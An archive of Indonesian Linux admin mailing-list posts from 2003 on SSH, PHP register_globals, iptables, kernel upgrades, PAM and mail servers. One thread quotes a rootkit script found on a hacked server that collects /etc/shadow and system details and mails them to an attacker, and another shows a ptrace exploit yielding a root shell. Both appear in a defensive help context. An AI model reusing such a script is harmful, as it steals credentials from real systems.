Re: [linux-admin] kill user ssh
At 16:01 21/10/2003, you wrote: Hai para admin, Sebuah server yg ada di network saya menggunakan ssh untuk remotenya, tapi komputer (client) saya belakangan ini sering restart tiba-tiba jadi begitu saya akses remote ke server tsb lagi masih ada user session yang sebelumnya terlihat dari command #who. Masalahnya bagaimana cara "Kill" user session ssh yg sebelumnya telah ada? dan adakah options pada sshd.conf untuk mengatasi hal ini? Kalo hanya mau KILL, khan bisa kita liat di # ps ax Kemudian, KILL -9 pid yg mengandung pts/x CMIIW Agung Ud "...persembahkan yang terbaik dalam hidup ini..." -- Berhenti langganan: [EMAIL PROTECTED] Arsip dan info: http://linux.or.id/milis.php
Re: [linux-admin] uninstall webalizer
At 13:10 15/10/2003, you wrote: bapak2 admin ... gimana yah caranya menguninstall webalizer di Red hat 7.2 yah Kalo paketnya RPM, tinggal di : # rpm -e paket_nya Utk liat paketnya, pake : # rpm -qa|grep webalizer (ntar akan muncul versi RPM nya, lalu tinggal di RPM -e nama_paket ybs secara lengkap). Biasanya, kalo pake webalizer, generate HTML di crontab, jadi jangan lupa crontab nya di bersihin juga dari command yg berhubungan dgn webalizer. btw, sebenernya gak masalah kalo gak di uninstall. Tinggal di crontab-nya aja yg di disable (webalizer-nya) CMIIW Agung Ud "...persembahkan yang terbaik dalam hidup ini..." -- Berhenti langganan: [EMAIL PROTECTED] Arsip dan info: http://linux.or.id/milis.php
Re: [linux-admin] error setelah di pindahin ke web server
At 01:05 16/10/2003, you wrote: > Dear All, saya sudah buat web server dgn spesikasi apache 1.3.28 php 4.3.4rc dgn mysql . aplikasi web sudah saya buat menggunakan phptriad dilocalhost , lalu saya upload ke web server,semua di localhost bisa berjalan normal tetapi sesudah di jalankan di web server , ada error.log seperti ini : [Wed Oct 15 10:47:59 2003] [error] PHP Notice: Use of undefined constant explanation - assumed 'explanation' in /home/helpdesk/www/finish/sap/view_detail.php on line 939 kira kira solusinya gimana . btw, line 939 apa ya pak ? Agung Ud "...persembahkan yang terbaik dalam hidup ini..." -- Berhenti langganan: [EMAIL PROTECTED] Arsip dan info: http://linux.or.id/milis.php
Re: [linux-admin] Register_Global
At 10:38 15/10/2003, you wrote: Terima kasih,...atas tanggapannya. Kemudian,...jika saya menggunakan server saya sebagai web server, mail server, dan ftp server di satu mesin. Pernyataan tersebut harus saya on atau off .. ? Apakah ada pengaruh dengan hak akses dari user-user yang ada di dalamnya? Kalo pengaruh dgn hak akses user, jawabnya TIDAK. Saya sarankan, set register_global = off. Cuman, ntar kalo scrip PHP gak jalan, silahkan "paksa" programmer php anda utk merubah script :-) btw, di server saya register_global terpaksa saya ON, krn script PHP yg saya buat sejak PHP3, jadi kalo merubah script PHP yg jumlahnya ratusan, wow..bikin ngeri .:-) Tapi, kalo server anda tidak melayani web hosting (dlm artian, hanya karywan kantor anda saja yg meletakkan script PHP), saya kira cukup aman kok, jadi kalo register_global = on gak apa2x. CMIIW. (kalo memang pertimbangannya, anda malas harus merubah script lama anda). Agung Ud "...persembahkan yang terbaik dalam hidup ini..." -- Berhenti langganan: [EMAIL PROTECTED] Arsip dan info: http://linux.or.id/milis.php
Re: [linux-admin] Register_Global
At 09:48 15/10/2003, you wrote: Dear,...admin Di file php.ini ada pernyataan Register_Global = on | off Maksud dari pernyataan tersebut untuk apa ya? Kemudian kapan opsi tersebut digunakan? Setahu saya (CMIIW), apabila register_global = on, maka pengolahan variable dari form akan sangat mudah. Artinya, PHP tidak terlalu peduli, apakah method yg digunakan GET ataupun POST, jadi bila register_global=on, utk menangkap variable dari form, kita cukup tulis (entah dia pake POST ataupun GET, tetap tertangkap). Tapi, bila register_global=off, maka kebalikannya, kita harus mendefine apakah pake method POST atau GET. So, kalo pake POST utk menangkap variable, kita harus nulis dan utk GET menjadi Utk keamanan, register_global silahkan di OFF khan, dgn konsekuensi semua scrip yg udah terlanjur dibuat tanpa membedakan POST atau GET, mesti dirubah. CMIIW Agung Ud "...persembahkan yang terbaik dalam hidup ini..." -- Berhenti langganan: [EMAIL PROTECTED] Arsip dan info: http://linux.or.id/milis.php
[linux-admin] Change server information on netcraft
Salam, Ada yang tahu gak yach, cara merubah informasi server, saat kita lihat di www.netcraft.com ? Seperti ini nich : Apache/2.0.47 (Trustix Secure Linux/Linux) PHP/4.3.2 Nah...info semacam itu, letaknya dimana yach ? Apache kah atau apa nich ? Terima kasih. Agung Ud "...persembahkan yang terbaik dalam hidup ini..." -- Berhenti langganan: [EMAIL PROTECTED] Arsip dan info: http://linux.or.id/milis.php
[linux-admin] FYI : Trustix bangkrut
Salam, Mungkin udah agak kadakuwarsa, FYI ajah : http://www.trustix.net/ Tapi, distronya tetep jalan terus oleh para developernya, cuman namanya ganti ajah. Sorry bagi yg udah tahu. Agung Ud "...persembahkan yang terbaik dalam hidup ini..." -- Berhenti langganan: [EMAIL PROTECTED] Arsip dan info: http://linux.or.id/milis.php
[linux-admin] OOT: aksesoris Linux
Sory OOT, Di mana yach bisa saya dapatkan aksesoris Linux (such as Boneka Pinguin ) Saya dulu pernah beli di Bandung, tempatnya di warnet deket Fotokopi di Jl. Tamansari. Tapi beberapa bulan kemaren, saya cek di situ, warnetnya udah tutup. So...ada info, dimana saya bisa dapatkan aksesoris Linux (boneka Pinguin) di Jakarta (atau di Bdg boleh) ? Thanks, sorry OOT mas admin. Agung Ud "...persembahkan yang terbaik dalam hidup ini..." -- Berhenti langganan: [EMAIL PROTECTED] Arsip dan info: http://linux.or.id/milis.php
Re: [linux-admin] mod_php-mysq di redhat 6.0
At 19:20 11/10/2003, you wrote: haloo semuanya ... saya lagi cari file rpm mod_php-mysql yg akan di gunakan dengan php3 dan mysql 3.22.27, atau adakah cara lain agar apache-1.3.14-2.6.2 , php3 dan mysql 3.22.27 dan digunakan bersama sama ??? saya tidak berencana untuk mengkompile dari source .. :D Kenapa ? bukannya kompile sendiri lebih enak... btw, PHP3 sangat vulnerable lho ? saya saranin d/l PHP4 versi terakhir. Setelah itu tinggal compile : ./configure --with-apxs=/path/to/apxs make make install Setelah itu tinggal update dikit di httpd.conf Dan...PHP,MySQL udah jalan mulus dengan Apache. keadaannya sekarang php dan apache sudah dapat berjalan sama tapi mysql nya blun bisa di connect dari php3, mungkin perlu php-mysql.. ada yg tau lokasi download file rpm mod_php-mysql untuk php3 ataupun rpm php-mysql untuk php3 ??? Coba di rpmfind.net (.org .com ???) Atau coba kunjungi web dari distro anda (RedHat), biasanya mereka punya source RPM nya. (tapi kalo gak salah, untuk RedHat 7.0 ke bawah udah gak di support lagi oleh RedHat.com) CMIIW Agung Ud "...persembahkan yang terbaik dalam hidup ini..." -- Berhenti langganan: [EMAIL PROTECTED] Arsip dan info: http://linux.or.id/milis.php
RE: [linux-admin] kemanan server
Kalo saya sich, point-nya ada di NUTUP PORT. Soalnya, masih banyak yg "salah kaprah" dalam pengertian "nutup port" ini. Jadi kalo pake IPTABLES, yg cocok adalah "membatasi akses", bukan nutup port. CMIIW Agung Ud -Original Message- From: Suwignyo [mailto:[EMAIL PROTECTED] Sent: Tuesday, October 07, 2003 10:39 AM To: [EMAIL PROTECTED] Subject: Re: [linux-admin] kemanan server Saya setuju dengan dengan menggunakan IPTABLES untuk menutup port, Kalau mematikan Servicenya memang beres tapi kadang kita perlu juga masuk ke server kita sendiri lewat Remote, Atau kalau mau lebih secure lagi ngga usah diinstall saja servicenya dari pada harus servicenya dimatiin. Swg --- -- Berhenti langganan: [EMAIL PROTECTED] Arsip dan info: http://linux.or.id/milis.php
Re: [linux-admin] masalah eth sis900
At 13:23 06/10/2003, you wrote: semuanya ok gak tau napa tu, barusan coba pakai ethernet 3com bisa. gak tau masalah nya ni aneh juga, bisa ping diri sendiri tp ping ke kom lain gak bisa. kalau kita pakai 3 com jalan mulus ada yg punya saaran Sarannya adalah : yg Sis di simpan di lemari aja, trus yg 3Com dipake di Linux :-) Beres khan ? Agung Ud -- Berhenti langganan: [EMAIL PROTECTED] Arsip dan info: http://linux.or.id/milis.php
Re: [linux-admin] kemanan server
At 00:15 07/10/2003, you wrote: kalo ingin gak ada yang bisa masuk server,, tutup aja telnet port 23 dan ssh port 22 cara nutupnya pake iptables ato ipchains Kenapa mesti pake IPTABLES untuk notop port ? Tinggal matiin aja servicenya, beres khan ? soalnya nutup port itu TIDAK SAMA ANALOGINYA dengan menutup genteng yang bocor lho (atau pintu). CMIIW Agung Ud -- Berhenti langganan: [EMAIL PROTECTED] Arsip dan info: http://linux.or.id/milis.php
Re: [linux-admin] /lib/setup
He...he...he...
Linux anda udah kebobolan tuch pak ...:-(
Sang hacker punya email di [EMAIL PROTECTED], coba hubungi aja dan ajak
makan bersama :)
Untuk amannya, segera lakukan cek system secara total.
Matikan daemon yang gak perlu dan bermasalah, dan jangan lupa bahwa RedHat
7.2 dgn default installasi, masih vurnarable dgn PTRACE exploit, jadi kalo
mempertahankan RH 7.2 nya, jangan lupa upgrade kernel anda.
Kalo gak mau pusing, install ulang ajah.
Saran saya, pake Trustix Secure Linux 2. Dia udah kernel 2.4, serta secara
default dia sangat ketat. Sbg contoh, bila kita buat file baru, maka secara
default permisionnya 600.
Juga, kalo jalanin BIND, dia secara default dubuatin chroot utk jalanin BIND.
CMIIW
Agung Ud
At 02:41 25/09/2003 +0700, you wrote:
Dear All,
Di RH 7.2 saya ada file yang
Namanya /lib/setup dan berisi sbb;
PWD=`pwd`
cd /lib
export PATH=.:$PATH
httpd >/dev/null
cd /usr/lib
identd & >/dev/null
cd "$PWD"
/sbin/ifconfig | grep inet >/tmp/mailtone
echo ## >> /tmp/mailtone
uname -a >> /tmp/mailtone
echo ## >> /tmp/mailtone
hostname -i >> /tmp/mailtone
echo ## >> /tmp/mailtone
uptime >> /tmp/mailtone
echo ## >> /tmp/mailtone
ping -c 2 216.115.108.245 >> /tmp/mailtone
system(" echo ## >>/tmp/mailtone cat
/etc/shadow >>/tmp/mailtone echo ## >>
/tmp/mailtone cat /etc/*release >>/tmp/mailtone echo
## >> /tmp/mailtone /usr/sbin/lsof -i -n -P
>>/tmp/mailtone echo ## >> /tmp/mailtone cat
/etc/sysconfig/nework-scripts/ifcfg* >> /tmp/mailtone echo
END### >> /tmp/mailtone cat /tmp/mailtone |mail -s
power-6668 [EMAIL PROTECTED] rm -f /tmp/mailtone
Karena gak tau dan pas booting tampaknya
File ini dipanggil beberapa kali oleh rc.local, sysinit, dll Untuk
sementara saya rename aja jadi setup2 - akibat muncul err. Message file
not found. Buat apa ya ada yang kepengen tau data2 seperti tersebut di
atas? Ada yang bisa kasih info gak ini file apa?
--
regards,
Tajid Yakub,
http://www.breakfree.web.id
--
Berhenti langganan: [EMAIL PROTECTED]
Arsip dan info: http://linux.or.id/milis.php
Re: [linux-admin] tolongin upgrade kernel donk ?!
At 12:23 AM 9/19/03 +0700, you wrote: # grub.conf generated by anaconda # # Note that you do not have to rerun grub after making changes to this file # NOTICE: You do not have a /boot partition. This means that # all kernel and initrd paths are relative to /, eg. # root (hd0,6) # kernel /boot/vmlinuz-version ro root=/dev/hda7 # initrd /boot/initrd-version.img #boot=/dev/hda default=0 timeout=3 splashimage=(hd0,6)/boot/grub/splash.xpm.gz title Red Hat Linux (2.4.20-8) root (hd0,6) kernel /boot/vmlinuz-2.4.20-8 ro root=LABEL=/ initrd /boot/initrd-2.4.20-8.img title Red Hat Linux (2.4.22) root (hd0,6) kernel /boot/vmlinuz-2.4.22 ro root=LABEL=/ initrd /boot/initrd-2.4.22.img Coba yg ini : title Red Hat Linux (2.4.22) root (hd0,6) kernel /boot/vmlinuz-2.4.22 ro root= /dev/hdaxxx LABEL=/ initrd /boot/initrd-2.4.22.img dimana : /dev/hdaxxx (atau /dev/sdaxxx kalo anda pake SCSI) adalah partisi dimana tempat "/" berada. Utk ngecek dimana "/" berada, khan bisa pake : # df Semoga membantu, CMIIW Agung Ud --- "persembahkan yang terbaik dalam hidup ini..." -- Berhenti langganan: [EMAIL PROTECTED] Arsip dan info: http://linux.or.id/milis.php
Re: [linux-admin] tanya port yang terbuka
At 09:00 AM 9/18/03 +0700, you wrote: Dear All, Saya menginstall mandrake 9.1 yang ingin saya jadikan web server, ada sedikit keanehan yaitu port yang dibuka oleh Mandrake banyak sekali, berikut hasil nmapnya : Betul kata mas Rony dan Mas Dapid, anda terkena paham aliran sesat :) Anyway, kira2x begini lho cara matiinnya Port State Service 21/tcp openftp Itu adalah program FTP server (secara default, Mandrake seingat saya pake ProFTP dan dijalankan via xinetd) Buka file /etc/xinetd.d/ftp (atau kata2x yg mirip dgn-nya) tambahkan baris : disable yes Setelah di simpan # service xinetd restart Hal yg sama berlaku pada service2x lain yg dijalankan oleh xinetd. Anda bisa cari sendiri khan ? 22/tcp openssh Itu service untuk remote mesin dari jauh, kalo anda ingin meremote mesin dari jauh, ya jangan dimatiin tho. Cara matiin : # service sshd stop 25/tcp opensmtp Itu service untuk pengiriman email. Cara matiin : # service postfix stop (krn seingat saya, Mandrake pake SMTP default Postfix) 53/tcp opendomain Service DNS Server # service named stop 80/tcp openhttp # service httpd stop 111/tcpopensunrpc # service portmap stop Yang lain, cari sendiri yach.. 139/tcpopennetbios-ssn 443/tcpopenhttps 687/tcpopenunknown 754/tcpopenkrb_prop 901/tcpopensamba-swat 932/tcpopenunknown 953/tcpopenrndc 2049/tcp opennfs 3306/tcp openmysql 6000/tcp openX11 1/tcp opensnet-sensor-mgmt 32770/tcp opensometimes-rpc3 32771/tcp opensometimes-rpc5 Oh ya...bila ingin sehabis restart service2x yg dimatiin tadi gak hidup lagi, jangan lupa dimatiin saat start-up nya pake CHKCONFIG contoh : # chkconfig portmap off (utk mematikan saat start up). Service yg lain, lihat aja pake : # chkconfig --list Agung Ud --- "persembahkan yang terbaik dalam hidup ini..." -- Berhenti langganan: [EMAIL PROTECTED] Arsip dan info: http://linux.or.id/milis.php
[linux-admin] usr/local/bin/multilog: access denied
Salam, Barusan saya install qmail pada Trustix Secure Linux 2. Muncul masalah pada saat selesai buat qmail-send readproctitle service errors: ...un /usr/local/bin/multilog: access denied?setuidgid: fatal Kayaknya error permission utk setuidgid. Ada yg pernah ngalamin hal demikian gak ? Solusinya gimana yach kira2x ? ps: langkah yg sama telah berkali2x saya coba pada RedHat 7.2 dan 8.0, tetapi semuanya aman-aman ajah. Mungkin karena setting default dari TSL 2 yang sangat ketat. Terima kasih Agung Ud --- "persembahkan yang terbaik dalam hidup ini..." -- Berhenti langganan: [EMAIL PROTECTED] Arsip dan info: http://linux.or.id/milis.php
Re: [linux-admin] IPTABLES on built in Kernel (SOLVED)
At 11:05 AM 9/11/03 +0700, you wrote: Mungkin kesimpulan anda perlu diralat hehe :-), karena di saya, kernel 2.4.22 (dengan imbuhan patch grsecurity) bisa jalan iptablesnya walaupun semuanya menggunakan sistem built-in. Betul, dan maaf tentang kesimpulan sementara saya kemarin ternyata salah :( Setelah saya abis, dan teliti satu persatu, saya udah bisa pake IPTABLES dgn built in mode. Terima kasih atas masukannya. Kalau mau melihat file .config nya silakan disini, mungkin ada gunanya : http://hujan.cakra.web.id/config-2.4.22-grsec.txt Terima kasih sekali lagi mas Asfik. Saya coba pake patch dari gsecurity, dan emang betul-betul restrictic betul. Saking ketatnya, (pada awalnya saya gak begitu banyak baca "help" nya, makanya di bawah opsi GS Security saya pilih semua) sehingga saya gak bisa login :( Jadinya saya compile ulang dan dipilih dengan hati2x, dan bisa dgn sukses. Matur suwun sekali lagi mas Asfik atas masukannya dan contoh konfigurasinya. Agung Ud --- "persembahkan yang terbaik dalam hidup ini..." -- Berhenti langganan: [EMAIL PROTECTED] Arsip dan info: http://linux.or.id/milis.php
Re: [linux-admin] apache + php ->mas agung?
At 02:06 AM 9/10/03 -0700, you wrote: pesan errornya spt ini: " Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /web/html/forum/common.inc on line 51" anehnya di server yang lain gak ada masalah Kalo saya, curiga di script anda. Dan alasan anda bahwa di lain server script tsb gak ada masalah, ini berarti ada setting pada server baru anda ini yg gak sama dgn server yg pernah sukses jalanin script tsb. Tebakan saya adalah, anda kurang cermat saat menangkap variable dari form, yg selanjutnya nilai dari variable tsb anda gunakan untuk melakukan query. Benarkah query anda memakai variable yang di "tangkap" dari form ? Sekali lagi harap di ingat bahwa, PHP sejak versi 4.x.x (saya lupa tepatnya berapa), secara default setting "register_global = Off". Ini berarti, kalau biasanya untuk menangkap form, anda cukup : echo $variable; Maka, bila "register_global = Off", anda harus merubah script anda menjadi : echo $HTTP_GET_VARS["variable"] => kalo pake GET, dan ganti dgn POST bila pake method POST. Kalo memang, permasalahannya ada di situ, ada 2 alternatif solusi : 1. Rubah semua script anda yang berkaitan dengan tangkap menangkap variable form 2. Edit file php.ini, cari baris yg berisi "register_global = Off", rubah menjadi "On". Jangan lupa restart Apache anda. Semoga membantu, mungkin saya salah. CMIIW Agung Ud --- "persembahkan yang terbaik dalam hidup ini..." -- Berhenti langganan: [EMAIL PROTECTED] Arsip dan info: http://linux.or.id/milis.php
Re: [linux-admin] IPTABLES on built in Kernel (SOLVED)
Salam, Terima kasih atas masukan dari temen2x semua. Problem yg saya posting sebelum ini, kini telah ter SOLVE. Yaitu dgn compile kernel dg Loadable Module . Jadi kalo pake Built In, IPTABLES gak akan bisa, tapi bila kitaaktifkan "loadable module", maka option IPTABLES dan temen2xnya ada semua di menuconfig. Mungkin kesimpulan sementara, kalau ingin mempunyai kernel yg praktis dgn system built-in, lupakan IPTABLES support. CMIIW Agung Ud --- "persembahkan yang terbaik dalam hidup ini..." At 09:03 AM 9/10/03 +0700, you wrote: Salam, Pada Linux saya saat installasi awal (system kernel modular) sudah terpasang IPTABLES dan berjalan dengan normal. Kemudian saya upgrade kernel ke 2.4.22 dengan system built in (gak ada modular lagi). Setelah boot dan kernel udah berubah ke kernel yg baru, timbul masalah, IPTABLES gak bisa jalan lagi : [EMAIL PROTECTED] /# iptables -L iptables v1.2.8: can't initialize iptables table `filter': Table does not exist (do you need to insmod?) Perhaps iptables or your kernel needs to be upgraded. Apakah mesti di install ulang paket IPTABLES nya yach ? note : di bawah ini, catatan saya pada saat upgrade kernel baru, semuanya built in (saya ambil yg berhubungan dengan netfilter) Apakah masih ada yang kurang ? Networking options ---> [*] Packet socket [*] Network packet filtering (replaces ipchains) [*] TCP/IP networking [*] IP: multicasting IP: Netfilter Configuration ---> [*] IP tables support (required for filtering/masq/NAT) [*] MAC address match support [*] Packet type match support [*] Multiple port match support [*] TOS match support [*] LENGTH match support [*] ARP tables support [*] ARP packet filtering -- Berhenti langganan: [EMAIL PROTECTED] Arsip dan info: http://linux.or.id/milis.php
Re: [linux-admin] Configure network address
At 04:44 AM 9/10/03 +, you wrote: Selain pake ifconfig, command line apalagi yah yg bisa dipake buat configure network address di redhat linux 9? Kalo saya sich, lebih suka edit file : /etc/sysconfig/network-scripts/ifcfg-eth0 Kemudian tinggal # service network restart Agung Ud --- "persembahkan yang terbaik dalam hidup ini..." -- Berhenti langganan: [EMAIL PROTECTED] Arsip dan info: http://linux.or.id/milis.php
Re: [linux-admin] apache + php + mysql
At 09:39 PM 9/9/03 -0700, you wrote: Dear admin Saya sbg pemula di linux, saya coba2 nginstall apache_1.3.27 php_4.2.3 dan mysql-3.23.47 di prefix /usr/local/apache dan /usr/local/mysql dgn metoda static (apache & php) dan sudah di test dgn phpinfo(); dan sukses , namun ketika saya bikin script aplikasi database ternyata tidak jalan query dan coneksi ke db tsb, padahal saya coba jalankan phpmyadmin dari browser gak masalah, kira-kira kenapa ya?? mohon pencerahannya nih sudah compile samapi 3 x sama saja Kalo anda install MySQL nya dari source dan pake prefix=/path/mysql, jangan lupa saat configure PHP pake --with-mysql=/path/mysql Tapi dilihat dari pengalaman anda bahwa phpMyAdmin udah jalan, berarti gak ada masalah tuch di php, apache dan mysql. Mungkin script anda yang bermasalah ;) Atau, anda lupa bahwa sejak PHP-4.x.x "register_global = Off" secara default, dan script anda mengabaikan hal tsb (kalo pake form). Enaknya sich, pesan error dari script anda di paste ke sini. Agung Ud --- "persembahkan yang terbaik dalam hidup ini..." -- Berhenti langganan: [EMAIL PROTECTED] Arsip dan info: http://linux.or.id/milis.php
[linux-admin] IPTABLES on built in Kernel
Salam, Pada Linux saya saat installasi awal (system kernel modular) sudah terpasang IPTABLES dan berjalan dengan normal. Kemudian saya upgrade kernel ke 2.4.22 dengan system built in (gak ada modular lagi). Setelah boot dan kernel udah berubah ke kernel yg baru, timbul masalah, IPTABLES gak bisa jalan lagi : [EMAIL PROTECTED] /# iptables -L iptables v1.2.8: can't initialize iptables table `filter': Table does not exist (do you need to insmod?) Perhaps iptables or your kernel needs to be upgraded. Apakah mesti di install ulang paket IPTABLES nya yach ? note : di bawah ini, catatan saya pada saat upgrade kernel baru, semuanya built in (saya ambil yg berhubungan dengan netfilter) Apakah masih ada yang kurang ? Networking options ---> [*] Packet socket [*] Network packet filtering (replaces ipchains) [*] TCP/IP networking [*] IP: multicasting IP: Netfilter Configuration ---> [*] IP tables support (required for filtering/masq/NAT) [*] MAC address match support [*] Packet type match support [*] Multiple port match support [*] TOS match support [*] LENGTH match support [*] ARP tables support [*] ARP packet filtering Agung Ud --- "persembahkan yang terbaik dalam hidup ini..." -- Berhenti langganan: [EMAIL PROTECTED] Arsip dan info: http://linux.or.id/milis.php
[linux-admin] Pembatasan su -
Salam, Saya baru saja install Trustik Secure Linux 2. Konfigurasi default-nya cukup aman juga. Terbukti tidak bisanya user biasa melakukan "su -" Di file /etc/pam.d/su ada baris : auth required /lib/security/pam_wheel.so group=root Yang artinya adalah, hanya user yang menjadi group "root" saja yg boleh melakukan "su -". (CMIIW) Nah, saya ingin memasukkan "user biasa" yang bukan anggota group "root", agar boleh melakukan "su -", dengan menambahkan : auth required /lib/security/pam_wheel.so trust agung Dengan baris di atas, saya berharap user "agung" bisa melakukan "su -". Tetapi kenyataannya tidak bisa (baru bisa setelah user "agung" saya "usermod" sehingga menjadi anggota gruop "root") Pertanyaannya, bagaimana agar user biasa (yg bukan member dari "root") bisa melakukan "su -" ? Apakah masih salah cara yg saya lakukan di atas ? Terima kasih. Agung Ud --- "persembahkan yang terbaik dalam hidup ini..." -- Berhenti langganan: [EMAIL PROTECTED] Arsip dan info: http://linux.or.id/milis.php
[linux-admin] Mass Add User
Salam, Adakah trik dan tips utk menambah user Linux (add user) secara massal ? misalkan saya punya daftar calon user sebanyak 50, dan udah saya tulis di sebuah file "user.txt". Nah...kalo ada script gitu, khan lebih cepat. Terima kasih. -- Agung Ud "...persembahkan yang terbaik dalam hidup ini ..." -- Berhenti langganan: [EMAIL PROTECTED] Arsip dan info: http://linux.or.id/milis.php
[linux-admin] fecthmail + Postfix
Salam, Saya udah install di Server Intranet saya, Postfix, Fetcmail, Procmail dan tpop3. Utk Postfix udah saya buat virtual email dan berhasil dgn baik, domain lokal adalah "company.net" Kami juga punya domain internet yg di hosting di ISP, dgn domain company.co.id Semua email rencananya akan di fetch dg fetchmail dan dideliver ke masing2x "[EMAIL PROTECTED]" (jadi ntar user tinggal POP3 ke server local). # vi .fetchmailrc poll mail.company.co.id protocol pop3 user [EMAIL PROTECTED] password rahasia is agung here # vi .procmailrc :0 * [EMAIL PROTECTED] ! [EMAIL PROTECTED] Dengan konfigurasi di atas, saya berharap semua email yg ke [EMAIL PROTECTED] akan di deliver ke [EMAIL PROTECTED] Bener gak sich ? Tapi setelah di cek di [EMAIL PROTECTED], email gak nyampe juga yach ? (padahal proses # fetchmail -vudah berhasil dengan baik, artinya email udah masuk ke server lokal, tapi gak tahu terus kemana). Tapi kemudian, saya mendapatkan email bounching : ## Hi. This is the qmail-send program at smtp-x.uninet.net.id. I'm afraid I wasn't able to deliver your message to the following addresses. This is a permanent error; I've given up. Sorry it didn't work out. <[EMAIL PROTECTED]>: Sorry, I couldn't find any host named localhost.company.net. (#5.1.2) ### Anehnya, kenapa kok ada "localhost" -nya yach ? apa itu masalahnya ? sedikit configurasi dari /etc/postfix/main.cf myhostname = company.co.id mydomain = company.net myorigin = $mydomain inet_interfaces = all mydestination = $myhostname, $mydomain (tidak semua saya posting) Terima kasih atas pencerahannya. -- Agung Ud "...persembahkan yang terbaik dalam hidup ini ..." -- Berhenti langganan: [EMAIL PROTECTED] Arsip dan info: http://linux.or.id/milis.php
[linux-admin] PTRACE in 2.4.21-ow2 at RH 7.0
Salam, Saya punya RedHat 7.0, dan kernel udah di upgrade ke versi 2.4.21 dgn patch OpenWall. Dan upgrade kernel dgn system buit-in semua (gak ada kernel modular). Kalo sbg root, dgn "lsmod " udah keluar "function not implemented", tapi kalo dgn user biasa, perintah "lsmod" masih bisa yach ? (dgn pesan "/proc/modules: No such file or directory"). Tapi, kenapa ptrace exploit masih lolos juga yach ? Apa karena hal tsb, sehingga RedHat sudah tidak mensupport RH 7.0 di ERRATA nya ? Ada solusi utk barang bernama PTRACE exploit ini ? [EMAIL PROTECTED] /root]# uname -a Linux 2.4.21-ow2 #1 SMP Sat Aug 23 14:48:19 JAVT 2003 i686 unknown [EMAIL PROTECTED] /root]# lsmod Module Size Used by lsmod: QM_MODULES: Function not implemented [EMAIL PROTECTED] agung]$ lsmod Module Size Used by /proc/modules: No such file or directory [EMAIL PROTECTED] agung]$ ./ptrace sh-2.04# whoami root Agung Ud " . persembahkan yang terbaik dalam hidup ini ." -- Berhenti langganan: [EMAIL PROTECTED] Arsip dan info: http://linux.or.id/milis.php
Re: [linux-admin] StarOffice 6.0 lagi
On Thursday 21 August 2003 14:43, Casiopea Aja wrote: > saya sudah menghubungi PT. Sun Microsystems Indonesia (anak perusahaan > Metrodata) lewat tlp tapi kagak ada yang ngangkat, dah kirim email juga > tapi gak ada balasannya Kenapa mesti pake Star Office (yg mesti bayar ?) pake aja tuh OpenOffice, kemampuan sama aja dengan Star Office kok. Agung Ud - To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED]
[linux-admin] Mail System for Workgroup
Salam, Saat ini, saya pake Microsoft Post Office dari Win 95 utk menghandle Email Intranet. Sedangkan mail client para user, kita pake Microsoft Outlook (bukan Outlook Express). Di MS Outlook, ada pilihan utk memasukkan email workgroup (dgn server Microsoft Post Offce dari Win 95) dan email external (protokol POP). Di kantor saya, email external (yg pake POP) saya hostingkan di sebuah web hosting. Jadi, user tinggal ngambil email POP nya dgn Microsoft Outlook, dan di sisi lain, dia masih bisa mengirim ke sesama user di dalam kantor dengan mail client yg sama (tapi yg menghandle Microsoft Post Office tadi). nah, kalo saya ingin migrasi ke Linux, kira2x system apa yach bisa seperti ini ? Pointnya ada 2 : 1. Bisa melayani email internal utk sesama user dalam jaringan (jadi, gak perlu koneksi internet. Di samping itu, tidak semua karyawan mendapatkan email POP). 2. Bisa melayani email ke luar (Internet, protokol POP3) Apakah QMAIL dengan sembarang mail client bisa (KMail) ? Terima kasih Agung Ud " . persembahkan yang terbaik dalam hidup ini ." - To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED]
Re: [linux-admin] configure & test running
At 10:58 21/08/2003 +0700, you wrote: mohon bantuan saya selesai install php 4xx bagaimana configure dan cara test running untuk yang 1 kalinya terimakasih Buat file dengan nama info.php letakkan di web direktory. Kemudian, dari browser panggil filr tsb : http://localhost/info.php Agung Ud " . persembahkan yang terbaik dalam hidup ini ." - To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED]
RE: [linux-admin] iptables
At 17:01 19/08/2003 +0800, you wrote: Minta pencerahan mengenai ipchains atau transparent proxy untuk connect internet. Bagaimana caranya ngeset ipchains dan transparent proxy?, Dimana saya bisa mendapatkan sample atau contoh ngesetnya??? Thank's Cukup mudah kok ;) Andaikan SQUID listen di port 8080, dan eth1 menuju ke LAN kita, cukup kasih perintah ini : (jangan lupa taruh di /etc/rc.local ) /sbin/iptables -A PREROUTING -t nat -i eth1 -p tcp --dport 80 -j REDIRECT --to-port 8080 Agung Ud " . persembahkan yang terbaik dalam hidup ini ." - To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED]
[linux-admin] RAID
Salam, Mau nanya tentang RAID nich ... Saya dapet "warisan" mesin Linux yg udah running, dari pendahulu saya. Dari hasil di bawah ini, apakah berarti SCSI saya menggunakan RAID ? Trus apakah betul, di PC saya ada 2 SCSI (1 utk file system, dan 1 utk RAID) Untuk recovery data dari RAID, emang gimana sich ? Kalo saya upgrade kernel, dan di kernel baru saya gak aktifin RAID bisa gak yach ? Soalnya saya mentok saat upgrade kernel utk mesin ini, pasti kernel panic (dan masalahnya sepertinya di SCSI / RAID nya) Mohon maaf, pertanyaannya basic, soalnya selama ini gak pernah mainan sama RAID $ dmesg |grep scsi scsi : 0 hosts. scsi : detected total. ncr53c896-0: restart (scsi reset). ncr53c896-1: restart (scsi reset). scsi0 : ncr53c8xx - version 3.2a-2 scsi1 : ncr53c8xx - version 3.2a-2 scsi : 2 hosts. scsi2 : Found a MegaRAID controller at 0xe002, IRQ: 16 scsi2 : AMI MegaRAID F 254 commands 16 targs 1 chans 8 luns scsi : 3 hosts. scsi2: scanning channel 1 for devices. scsi2: scanning virtual channel for logical drives. Detected scsi disk sda at scsi2, channel 1, id 0, lun 0 $ cat /proc/scsi/scsi Attached devices: Host: scsi2 Channel: 00 Id: 05 Lun: 00 Vendor: HP Model: SAFTE; U160/M BP Rev: 1020 Type: ProcessorANSI SCSI revision: 02 Host: scsi2 Channel: 01 Id: 00 Lun: 00 Vendor: MegaRAID Model: LD0 RAID5 34730R Rev: F Type: Direct-AccessANSI SCSI revision: 02 Agung Ud " . persembahkan yang terbaik dalam hidup ini ." - To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL 